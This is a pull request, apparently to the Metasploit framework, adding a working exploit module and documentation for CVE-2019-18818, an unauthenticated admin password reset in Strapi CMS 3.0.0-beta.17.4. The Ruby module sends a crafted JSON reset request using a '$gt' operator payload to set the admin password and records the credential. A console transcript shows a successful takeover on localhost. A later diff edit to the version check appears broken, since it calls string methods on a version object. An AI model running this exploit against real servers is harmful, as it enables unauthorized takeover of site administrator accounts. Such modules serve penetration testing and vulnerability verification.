### PR TITLE
strapi 3.0.0 beta 17.4 password reset (CVE-2019-18818)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/strapi_3_password_reset.md
+++ b/documentation/modules/auxiliary/scanner/http/strapi_3_password_reset.md
@@ -7,7 +7,15 @@ Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
 
 ### Install
 
-`npx create-strapi-app@3.0.0-beta.17.4 yourProjectName`
+
+```
+docker run -it -p 1337:1337 --rm node:16 /bin/bash
+export CXXFLAGS="-std=c++17"
+# Complete the quickstart
+npm install -g create-strapi-app@3.0.0-beta.17.4 && create-strapi-app yourProjectName
+```
+
+Navigate to http://localhost:1337/ to verify the application is running. Now create the first admin account at http://localhost:1337/admin
 
 ## Verification Steps
 

--- a/documentation/modules/auxiliary/scanner/http/strapi_3_password_reset.md
+++ b/documentation/modules/auxiliary/scanner/http/strapi_3_password_reset.md
@@ -1,0 +1,51 @@
+## Vulnerable Application
+
+This module abuses the mishandling of a password reset request for 
+Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user.
+
+Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
+
+### Install
+
+`npx create-strapi-app@3.0.0-beta.17.4 yourProjectName`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/strapi_3_password_reset`
+1. Do: `set new_password testtesttest`
+1. Do: `set rport 1337`
+1. Do: `set rhosts 127.0.0.1`
+1. Do: `run`
+1. You should be able to reset the admin users password
+
+## Options
+
+### NEW_PASSWORD
+
+New Admin password. No default.
+
+## Scenarios
+
+### npx install of strapi 3.0.0-beta.17.4
+
+```
+msf6 > use auxiliary/scanner/http/strapi_3_password_reset
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set new_password testtesttest
+new_password => testtesttest
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rport 1337
+rport => 1337
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > check
+[-] This module does not support check.
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > run
+
+[*] Resetting admin password...
+[+] Password changed successfully!
+[+] User: superadminuser
+[+] Email: none@none.com
+[+] PASSWORD: testtesttest
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/strapi_3_password_reset.rb
+++ b/modules/auxiliary/scanner/http/strapi_3_password_reset.rb
@@ -1,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Strapi CMS Unauthenticated Password Reset',
+        'Description' => %q{
+          This module abuses the mishandling of a password reset request for
+          Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user.
+
+          Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'WackyH4cker', # original module creation
+          'h00die' # lots of fixes, documentation, standardization
+        ],
+        'References' => [
+          [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ],
+          [ 'URL', 'https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.4' ],
+          [ 'URL', 'https://github.com/strapi/strapi/pull/4443' ],
+          [ 'CVE', '2019-18818' ],
+          [ 'EDB', '50716' ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2022-02-09',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('NEW_PASSWORD', [true, 'New Admin password']),
+      OptString.new('TARGETURI', [true, 'The base path to strapi', '/'])
+    ]
+  end
+
+  # not used, but figured id include it anyways
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'init')
+    })
+    return Exploit::CheckCode::Unknown('Unable to determine due to a HTTP connection timeout') if res.nil?
+
+    begin
+      version = JSON.parse(res.body)
+    rescue JSON::ParserError
+      return Exploit::CheckCode::Safe("Unable to parse json data: #{res.body}")
+    end
+
+    # Untested if it works with versions lower than 3.0.0-beta.17.4.
+    # builds of 3.0.0-beta.17.3 and lower fail:
+    # npm ERR! gyp: Undefined variable standalone_static_library in binding.gyp while trying to load binding.gyp
+    # however vulners shows 3.0.0 and up to 3.0.0-beta.17.4 are vulnerable
+    version = Rex::Version.new(version.dig('data', 'strapiVersion'))
+    if version <= Rex::Version.new('3.0.0-beta.17.4') && version >= Rex::Version.new('3.0.0')
+      return Exploit::CheckCode::Vulnerable("Vulnerable version detected: #{version.dig('data', 'strapiVersion')}")
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def run
+    json_post_data = JSON.generate({
+      'code' => { '$gt' => 0 },
+      'password' => datastore['NEW_PASSWORD'],
+      'passwordConfirmation' => datastore['NEW_PASSWORD']
+    })
+
+    print_status('Resetting admin password...')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'auth', 'reset-password'),
+      'ctype' => 'application/json',
+      'data' => json_post_data
+    })
+
+    if res.nil?
+      print_error('Unable to determine due to a HTTP connection timeout')
+      return
+    end
+
+    begin
+      json_resp = JSON.parse(res.body)
+    rescue JSON::ParserError
+      print_error("Unable to parse json data: #{res.body}")
+      return
+    end
+
+    unless res.code == 200
+      print_error('Could not change admin user password, unexpected response code')
+      return
+    end
+
+    print_good('Password changed successfully!')
+    print_good("User: #{json_resp['user']['username']}")
+    print_good("Email: #{json_resp['user']['email']}")
+    print_good("PASSWORD: #{datastore['NEW_PASSWORD']}")
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      workspace_id: myworkspace_id,
+      service_name: 'strapi cms',
+      address: rhost,
+      port: rport,
+      private_type: :password,
+      private_data: datastore['NEW_PASSWORD'],
+      username: json_resp['user']['username']
+    }
+    create_credential(credential_data)
+  end
+
+end

--- a/modules/auxiliary/scanner/http/strapi_3_password_reset.rb
+++ b/modules/auxiliary/scanner/http/strapi_3_password_reset.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
     # npm ERR! gyp: Undefined variable standalone_static_library in binding.gyp while trying to load binding.gyp
     # however vulners shows 3.0.0 and up to 3.0.0-beta.17.4 are vulnerable
     version = Rex::Version.new(version.dig('data', 'strapiVersion'))
-    if version <= Rex::Version.new('3.0.0-beta.17.4') && version >= Rex::Version.new('3.0.0')
+    if version.start_with?('3.0.0-beta') && (Rex::Version.new(version.split('-beta.')[1]) <= Rex::Version.new('17.4'))
       return Exploit::CheckCode::Vulnerable("Vulnerable version detected: #{version.dig('data', 'strapiVersion')}")
     end
 


### PR DESCRIPTION
fixes #16168

Adds a module that was in the issues for a while and just needed a cleanup/standardization/etc. Lets you reset the admin's password on Strapi CMS 3.0.0 Beta 17.4 and before

@smcintyre-r7 Not to push this to the top of the queue, but the npx install for 17.4 works, 17.3 failed because of a dependency being too out of date, and the docker image provided by the developers themselves fails due to a dependency out dated issue. This is a REALLY quick module to test, but I would suggest someone test it soon since its fairly old and who knows when the easy npx install route will start failing.


## Verification

- [ ] Start `msfconsole`
- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/strapi_3_password_reset`
- [ ] Do: `set new_password testtesttest`
- [ ] Do: `set rport 1337`
- [ ] Do: `set rhosts 127.0.0.1`
- [ ] Do: `run`
- [ ] You should be able to reset the admin users password
